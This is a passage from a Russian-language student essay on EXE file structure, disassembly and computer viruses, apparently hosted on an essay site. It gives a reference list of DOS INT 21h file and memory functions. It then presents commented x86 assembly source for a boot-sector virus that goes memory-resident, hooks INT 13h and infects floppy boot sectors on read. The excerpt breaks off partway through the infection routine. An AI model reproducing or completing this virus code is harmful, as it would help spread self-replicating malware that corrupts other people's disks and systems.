Быстрый поиск

Реферат: Семантический анализ структуры EXE файла и дисассемблер (с примерами и исходниками), вирусология

выход:

нет

Получить адрес DTA.

~~~~~~~~~~~~~~~~~~~

вход:

ah = 2Fh

выход:

es:bx = текущий адрес

Create - Создать файл.

~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 3Ch

cx = атрибуты файла (таб 1)

ds:dx = путь и имя файла в формате asciz

выход:

if CF=0 then

ax = дескриптор файла

else

ax = код ошибки (3,4,5) (таб 2)

Open - Открыть существующий файл

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 3Dh

al = режим доступа (таб 2)

cx = атрибуты

ds:dx = имя

выход:

if CF=0 then

ax = дескриптор файла

else

ax = код ошибки (1,2,3,4,5,0C)

Close - Закрыть файл

~~~~~~~~~~~~~~~~~~~~

вход:

ah = 3Eh

bx = дескриптор

ds:dx = имя

выход:

if CF=0 then

ax =

else

ax = код ошибки (6)

Read - Чтение из файла

~~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 3Fh

bx = дескриптор

cx = число байт

ds:dx = буфер для чтения

выход:

if CF=0 then

ax = число прочитанных байт

Это значение может быть меньше CX.

Например потому, что превысили длину файла.

else

ax = код ошибки (5,6)

Write - Записать в файл

~~~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 40h

bx = дескриптор

cx = число байт

ds:dx = данные для записи

выход:

if CF=0 then

ax = число записанных байт

else

ax = код ошибки (5,6)

Unlink - Удалить файл

~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 41h

cx = атрибуты

ds:dx = имя

выход:

if CF=0 then

ax =

else

ax = код ошибки (2,3,5)

LSeek - Установить указатель в файле

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 42h

al = точка отсчета указателя:

0 - от начала файла

1 - от текущего положения

2 - от конца

bx = дескриптор

cx:dx = смещение (cx=старшие 16 бит, dx=младшие)

выход:

if CF=0 then

dx:ax = новое положение указателя относительно начала

else

ax = код ошибки (1,6)

Получить атрибуты файла

~~~~~~~~~~~~~~~~~~~~~~~

вход:

ax = 4300h

ds:dx = имя

выход:

if CF=0 then

cx = атрибуты

else

ax = код ошибки (1,2,3,5)

Chmod - Установить атрибуты файла

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

вход:

ax = 4301h

cx = новые атрибуты

ds:dx = имя

выход:

if CF=0 then

ax =

else

ax = код ошибки (1,2,3,5)

Выделить блок памяти

~~~~~~~~~~~~~~~~~~~~

вход:

ah = 48h

bx = размер блока в параграфах

выход:

if CF=0 then

ax = сегмент блока

else

ax = код ошибки (7,8)

bx = размер наибольшего доступного блока

Освободить память

~~~~~~~~~~~~~~~~~

вход:

ah = 49h

es = сегмент блока

выход:

if CF=0 then

ax =

else

ax = код ошибки (7,9)

Изменить размер блока памяти

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 4Ah

bx = новый размер

es = сегмент

выход:

if CF=0 then

ax =

else

ax = код ошибки (7,8,9)

bx = размер наибольшего доступного блока

Exec - загрузить или выполнить программу.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

вход:

ah = 4Bh

al = тип загрузки:

0 - загрузить и выполнить

1 - загрузить и не выполнять

3 - загрузить оверлей

4 - загрузить и выполнить в фоновом режиме (dos 4.0)

es:bx = блок параметров (таб 3)

ds:dx = имя программы

выход:

if CF=0 then

bx,dx разрушены

else

ax = код ошибки (1,2,5,8,0A,0B)

Пример элементарного BOOT-вируса:

.286

.model tiny

.code

org 00h

start: jmp install

;jmp fkс

table: ; А вот тут будет таблица диска

org 4ch ; много места ей, но...

fkс: nop ;

xor di,di ; обнулим их

mov ds,di ; DS=0

cli ;

mov ss,di ; SS=0

mov si,7c00h ; SI - адрес в памяти, там мы

; начинаемся.

mov bx,si ; запомним это... еще пригодится

mov sp,si

sti

dec word ptr ds:[0413h] ; стока памяти дос

mov ax,ds:[0413h] ; в АХ размер дос-памяти в килобайтах

mov cl,06 ; чтобы получить сегмент надо число

shl ax,cl ; килобайт умножить на 40h

; немного арифметики - сегмент считают

; от начала памяти в параграфах, пара-

; граф=10h байт, 40h параграфов=400h

; байт=1кБт. дальше все ясно.

mov es,ax ; ES=адрес нового сегмента

push ax ; в стек его - будем делать переход

mov ax,offset inst_int ; на это вот смещение

push ax ; и его в стек тоже

mov cx,200h ; но сперва надо перенести свое тело

cld ; в этот вот сегмент

rep movsb ; переносим

retf ; переход через стек

inst_int: ; здесь мы уже в новом сегменте

mov ax,ds:[13h*4] ; INT 0E0h=INT 13h original

mov ds:[0e0h*4],ax ;

mov ax,ds:[13h*4+2] ;

mov ds:[0e0h*4+2],ax ;

mov word ptr ds:[13h*4],offset int13 ; INT 13h=наш обработчик

mov ds:[13h*4+2],cs ;

xor cx,cx

push cx ; снова подготовка к переходу

push bx ; через стек в точку 0000:7C00h

mov es,cx

mov ax,0201h ; читать нормальный бут-сектор

mov cx,cs:floppy_sect ; вот отсюда его и читать

mov dh,cs:floppy_head ;

xor dl,dl ; с диска А: естественно

int 0e0h ; вызов оригинального INT 13h

run_boot:

retf ; запустить бут.

;------ *** Hаш обработчик INT 13h *** -------

int13: mov cs:shit,ax ; сохраним ax

int 0e0h ; выполним операцию

jnc int_continue ; если была ошибка уходим

jmp int_exit

int_continue:

pushf ; флаги запомнить надо!

cmp byte ptr cs:[shit+1],2 ; reading sectors?

jnz g1

cmp cx,0001

jne g1

cmp dh,0 ; читаем бут

jne g1

cmp dl,01 ; не с винта надеюсь?

jna fkс_boot

g1: jmp get_out

;------------- Обработчик чтения бута с дискеты ---------------

fkс_boot:

pusha

push ds es

push es

pop ds

lea di,fkс ; сравним то что у нас по смещению fkс

mov ax,cs:[di] ; с тем что мы прочитали по тому же смещению

mov si,bx ; Так мы проверяем заражен ли

add si,offset fkс ; уже нами бут-сектор

cmp ax,[si] ;

jz exit_boot_work ; если нет то уйдем отсюда

cmp dl,1 ; на всякий пожарный :) В принципе можете

ja exit_boot_work ; эту проверку выкинуть - она уже была

find_place: ; поиск места куда прятать старый бут-сектор

mov ax,[bx+16h] ; ax=число секторов в FAT

mul byte ptr [bx+10h] ; умножим его на число FAT

add ax,[bx+0eh] ; прибавим число резервных секторов для FAT--

Страницы: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10

Новости

Быстрый поиск

Группа вКонтакте: новости

Пока нет

Новости в Twitter и Facebook

Новости

Обратная связь

Поиск

Обратная связь

Реклама и размещение статей на сайте

Меню

Быстрый поиск

Реферат: Семантический анализ структуры EXE файла и дисассемблер (с примерами и исходниками), вирусология

Новости

Быстрый поиск

Группа вКонтакте: новости

Новости в Twitter и Facebook

Новости

Обратная связь